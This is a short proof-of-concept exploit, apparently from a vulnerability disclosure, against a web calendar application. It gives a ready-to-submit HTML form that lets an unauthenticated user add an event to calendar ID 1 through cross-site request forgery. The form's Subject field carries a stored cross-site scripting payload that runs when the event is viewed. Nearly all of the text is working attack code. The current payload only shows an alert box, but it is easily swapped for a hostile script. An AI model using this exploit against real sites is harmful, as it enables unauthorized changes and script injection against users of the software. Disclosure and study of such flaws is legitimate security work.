As an unauthenticated user, to add a malicious event (on October 6th, 2022) to the calendar with ID 1, open the code below

    <form action="" method="POST">
      <input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="colorvalue" value="#f00" />
      <input type="hidden" name="rrule" value="" />
      <input type="hidden" name="rruleType" value="" />
      <input type="hidden" name="stpartdate" value="10/6/2022" />
      <input type="hidden" name="stparttime" value="00:00" />
      <input type="hidden" name="etpartdate" value="10/6/2022" />
      <input type="hidden" name="etparttime" value="00:00" />
      <input type="hidden" name="stpartdatelast" value="10/6/2022" />
      <input type="hidden" name="etpartdatelast" value="10/6/2022" />
      <input type="hidden" name="stparttimelast" value="" />
      <input type="hidden" name="etparttimelast" value="" />
      <input type="hidden" name="IsAllDayEvent" value="1" />
      <input type="hidden" name="Location" value="CSRF" />
      <input type="hidden" name="Description" value='<p style="text-align: left;">CSRF</p>' />
      <input type="hidden" name="timezone" value="4.5" />
      <input type="submit" value="Submit request" />

The XSS will be triggered when viewing the related event